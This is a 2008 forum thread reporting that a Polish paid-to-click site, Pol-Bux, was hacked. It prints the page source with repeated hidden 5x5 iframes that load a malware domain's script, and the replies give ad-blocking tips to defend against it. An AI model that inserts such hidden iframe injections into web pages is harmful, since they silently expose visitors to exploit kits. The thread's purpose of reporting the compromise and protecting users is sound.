Help - Search - Members - Calendar
Full Version: Pol-bux = AV Warning: Exploit Neosploit
Get Paid Forum - Get Paid Discussion > Get Paid To Programs > Sites Allegedly with problems of hacking/virus/0-iframes, autosearches etc ... > Sites hit by virusses or hacked
longshanks1971
Aug 14 2008, 02:16 PM
Source code URL: hxxp://www.pol-bux.cxm/index.php?ref=xx

AV warning of Exploit Neosploit and there are multiple golden corps 5x5 iframes which could be the source of the threat.

Extracted code;
CODE
<iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>


Complete code;
CODE
<a href="http://sepsis.ge/nordea-bank.html">nordea bank</a><html>
  <head>
  <title>Pol-Bux.com : Welcome To Pol-Bux.com!</title>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  <LINK href="favicon.ico" rel="icon">
  <link rel='stylesheet' href='style.css' type='text/css'>
  <script language="JavaScript" src="menu.js"></script>
  </head>
  <body>
  <table border="0" width="100%" cellspacing="0" cellpadding="0" height="100%" background="images/tlo.png">
  <tr><td height="120">
  <table border="0" width="100%" cellspacing="0" cellpadding="0" height="120" background="images/gora.png">
  <tr><td><img border="0" src="images/gora_logo.png" width="327" height="120"></td>
  <td align="right">
  <table border="0" width=486 cellspacing="0" cellpadding="0" height="120">
  <tr><td background="images/gora_baner.png" width="486" style="padding-bottom: 20px; padding-left:9px; padding-right:9px" valign="bottom"><a href="bannerclick.php?id=87" target="_blank"><img src="http://www.goodemails.com/banners/banner1.gif" border=0" width="468" height="60"></a></td></tr>
  </table>
  </td></tr>
  </table>
  </td></tr>
  <tr><td style="padding-top:10px" height="50">
  <table cellpadding=0 cellspacing=0 width="100%">
  <tr><td align="center" class="menu" height="46"><div id='left2'></div><div id='right2'></div><div class="odstep">
  <a href="index.php?view=home&ref=Ibad786&" title="Welcome Page">Home</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=news&ref=Ibad786&" title="News About Site">News</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=prices&ref=Ibad786&" title="Prices For Advertising Space">Prices</a>&nbsp;&nbsp;&nbsp;&nbsp;
  
  <a href="index.php?view=join" title="Join For Free!">Join</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=help&ref=Ibad786&" title="FAQ's To Help You Use Our Site">Help</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=terms&ref=Ibad786&" title="Terms For Our Site">Terms</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=payouts&ref=Ibad786&" title="Payments Proof">Payouts</a>&nbsp;&nbsp;&nbsp;&nbsp;
  <a href="index.php?view=contact&ref=Ibad786&" title="Contact Us With Any Comments/Suggestions">Contact</a>
  </div></td>
  </tr>
  
  
  </table>
  </td></tr>
  <tr><td valign="top">
  <table border="0" width="100%" cellspacing="5" cellpadding="0">
  <tr><td valign="top" width="15%">
  <table border="0" width="200" cellspacing="0" cellpadding="0">
  <tr><td>
  
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Log In</div>                
      <div id='tekst'>
      <h3>
      <div align=center style="padding:10px"><input type="button" value="Click Here To Log In" onclick="location.href='index.php?view=login&'" style="width:160"></div>
      </h3>
      </div>
  </div>
  </td></tr>
  <tr><td height=5></td></tr>
  <tr><td>
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Featured Ad</div>                
      <div id='tekst'>
      <h3>
      <b><a href="fadclick.php?id=71">Only The Best PTC</a></b><br><font style="font-size:9pt">trusted and paid me!!!</font>
      </h3>
      </div>
  </div>
  
  </td></tr>
  <tr><td height="5"></td></tr>
  <tr><td>
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Featured Links</div>                
      <div id='tekst'>
      <h3>
      <a href="flinkclick.php?id=8" target="_blank">POL-PTC.net - Promotion !!!</a><img src=images/okienko_belka_miedzy_reklamami.png width=100% height=2><b><a href="index.php?view=prices"><marquee scrollamount=3 scrolldelay=1><font color=#2A2A2A>Advertise Here</font></marquee></a></b>
      </h3>
      </div>
  </div>
  
  </td></tr>
  </table>
  </td>
  <td valign="top" width="70%">
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Welcome To Pol-Bux.com!</div>                
      <div id='tekst'>
      <h3>
      
  <div align="center">
  <br><a href="http://www.pol-bux.com/ptc"><img border=0 src=images/only_the_best_ptc.gif></a><br></b>
  <div align="center">
  <div align="center">
  <br><b><big><font color=black>Members</font></big></b><br>
  <table width="80%">
      <tr>
          <td>
  <b><ul type='square'>
  <li>Since 01-02-2008 Site is ads only
  <li>Free To Join
  <li>0,1 to 0,5 Cent Per Click
  <li>Links To Signup Featured
  <li>20% for Referral
  <li>No Limit On Earnings
  <li>Convert cash to ads than 4 cents
  </ul></b>
          </td>
          <td>
              <img src="images/members.png">
          </td>
      </tr>
  </table>
  
  <br><br>
  
  <b><big><font color=black>Advertisers</font></big></b><br>
  <table width="80%">
      <tr>
          <td>
              <img src="images/advertisers.png" align="left">
          </td>
          <td>
  <b><li>Daily Unique Hits
  <li>Instant Ad Activation
  <li>Easy To Use Purchasing Wizard
  <li>Low cost - Quality advertising
  <li>24/7 Live Stats
  <li>Paypal Payments</b>
          </td>
      </tr>
  </table>
  
  
  <br>
  
  <b><font style="font-size: 18pt;"><a href="index.php?view=join&ref=Ibad786&">Join Now</a></font></b><br>
  
  </div>
  
      </h3>
      </div>
  </div>
  
  </td>
  <td valign="top" width="15%">
  <table border="0" width="190" cellspacing="0" cellpadding="0">
  <tr><td>
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Todays Top 15</div>                
      <div id='tekst'>
      <h3>
      1. admin (0)<br>2. michalo125 (0)<br>3. kapiszon (0)<br>4. miirap (0)<br>5. black (0)<br>6. emobbs (0)<br>7. yby7895 (0)<br>8. am999 (0)<br>9. Faldegort (0)<br>10. enrico74 (0)<br>11. dusty (0)<br>12. stob (0)<br>13. wgwgg (0)<br>14. amanarora2402 (0)<br>15. havebehere (0)<br>
      </h3>
      </div>
  </div>
  
  </td></tr><tr><td height=5></td></tr><tr><td>
  <div id='menu'><div id='tlo'><div id='left'></div><div id='right'></div>Site Stats</div>                
      <div id='tekst'>
      <h3>
      Members: 4151<img src=images/okienko_belka_miedzy_reklamami.png width=100% height=2>
  New Today: 0<img src=images/okienko_belka_miedzy_reklamami.png width=100% height=2>
  Hits Today: 230<img src=images/okienko_belka_miedzy_reklamami.png width=100% height=2>
  Online: 1
      </h3>
      </div>
  </div>
  
  </td></tr>
  </table>
  </td></tr>
  </table>
  </td></tr>
  <tr><td height="127" valign="bottom">
  <table border="0" width="100%" cellspacing="0" cellpadding="0" background="images/dol.png" height="127">
  <tr><td>&nbsp;</td>
  <td align="center" background="images/dol_baner.png" width="600" style="padding-bottom:22px" valign="bottom">
  <p style="line-height:300%">
  <b><div class=stopka>Copyright © 2008 Pol-Bux.com - All rights reserved |
  Script Modify: <a href="http://www.kapiszon.net/">Kapiszon</a> |
  Design: <a href="http://www.pol-bux.com/ptc">Helloman</a></div></font></b>
  <!-- Begin BidVertiser code -->
  <script LANGUAGE="JavaScript1.1" SRC="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=85888&bid=202894" type="text/javascript"></SCRIPT>
  <noscript><a href="http://www.bidvertiser.com">marketing</a></noscript>
  <!-- End BidVertiser code --></td>
  <td>&nbsp;</td></tr>
  </table>
  </td></tr>
  </table>
  </body>
  </html><iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
  <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>


Reported via contact link

Edited to add, can't stop the auto searches loading long enough to get the contact page displayed
wagdoll
Aug 25 2008, 07:50 AM
QUOTE (longshanks1971 @ Aug 14 2008, 02:16 PM) *
Source code URL: hxxp://www.pol-bux.cxm/index.php?ref=xx

AV warning of Exploit Neosploit and there are multiple golden corps 5x5 iframes which could be the source of the threat.

Reported via contact link

Edited to add, can't stop the auto searches loading long enough to get the contact page displayed


Yes, http:// golden-corps.com is a known malware domain that is hacked onto websites by malware groups to spread viruses.

As soon as you come across one like this and find the domain resposible - like in this case it's the golden corps - put it in adblock by breaking it down to the base domain (golden-corps.com) and leaving the rest of the URL off, I also put them inside asterisks when I break a URL in this way (*golden-corps.com*) and leave off the http://www

Once you've done that you should stop getting the virus alerts and you'll be able to get into the contact page. Then if you come across that again it will show up in red in the adblock list. You can make a note of the URLs you add in a notebook to remind you of the reason you added something to adblock, eg autosearches, viruses etc because after a few months of doing this the adblock list can get very long and hard to remember why you added each domain

HTH aa.gif
longshanks1971
Aug 25 2008, 08:17 AM
That did help wagdoll, thank you very much. By following your advice I was able to get the site loaded, however every link on that site, contact - faq etc only loads the homepage, whether this is related to the problem I'm not sure. But, and I don't know why I didn't think to do it before, I managed to get an email adress from the whois and have sent a mail alerting them to the problem.

Thanks for the advice about adblock and how to remeber what is for what thats very useful info and will certainly help me and, I'm sure. will help others as well.

Take care,

Craig
jlandis
Aug 26 2008, 03:04 AM
QUOTE (wagdoll @ Aug 25 2008, 06:50 AM) *
... put it in adblock by breaking it down to the base domain (golden-corps.com) and leaving the rest of the URL off, I also put them inside asterisks when I break a URL in this way (*golden-corps.com*) and leave off the http://www


Wagdoll's advice here is critically important, because if you leave the "http://www" at the beginning of a malware domain entry and then later hit an URL on that domain that's been coded without the "www", you won't be protected. Likewise, if you've only entered it with "http://" you're exposed when you hit a version coded with the "www".

QUOTE (wagdoll @ Aug 25 2008, 06:50 AM) *
You can make a note of the URLs you add in a notebook to remind you of the reason you added something to adblock, eg autosearches, viruses etc because after a few months of doing this the adblock list can get very long and hard to remember why you added each domain


I've developed a quick shorthand for this that might be useful. Since asterisks aren't necessary when AdBlocking an entire domain, you can use asterisks to tell you at a glance whether the domain you're blocking carries fraud or malware.

When entering a domain because it carries fraudulent frames or scripts (things that hurt others), enter the domain followed by an asterisk: domain.com*

When entering a domain that carries a virus or other malware (things trying to hurt you directly), enter an asterisk before the domain: *domain.com

Then you can enter domains you're blocking for other reasons without any asterisks.

This way when you see an URL in your AdBlock list lit up in red, you can see quickly if there's an asterisk before or after it in the Filter column, which alerts you to fraud or danger that needs reporting.
longshanks1971
Aug 26 2008, 12:43 PM
Thanks very much for that advice as well, it does make things simpler.

I received a reply today but unfortunately it was in a language that on-line translators could deal with - Polish at a guess, so I don't know what they doing about it or even if they understand my email as it was sent in English. Just tried it again and it's all still there but I did direct them to this thread so maybe something will be done.

Thanks again for the advice both of you, it will help a lot of other people as well as me.

Take care,

Craig
SaraM
Aug 26 2008, 05:04 PM
I get so mad that people pull this kind of stuff. I am glad I found this forum so that I can know what's legit beforehand bj.gif
jlandis
Aug 26 2008, 07:17 PM
QUOTE (longshanks1971 @ Aug 26 2008, 11:43 AM) *
Thanks again for the advice both of you, it will help a lot of other people as well as me.


That's kind of you. Thanks for your reports and followup. You're helping equip people to prevent a lot of harm.

QUOTE (SaraM @ Aug 26 2008, 04:04 PM) *
I get so mad that people pull this kind of stuff. I am glad I found this forum so that I can know what's legit beforehand


Me too SaraM. Welcome!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.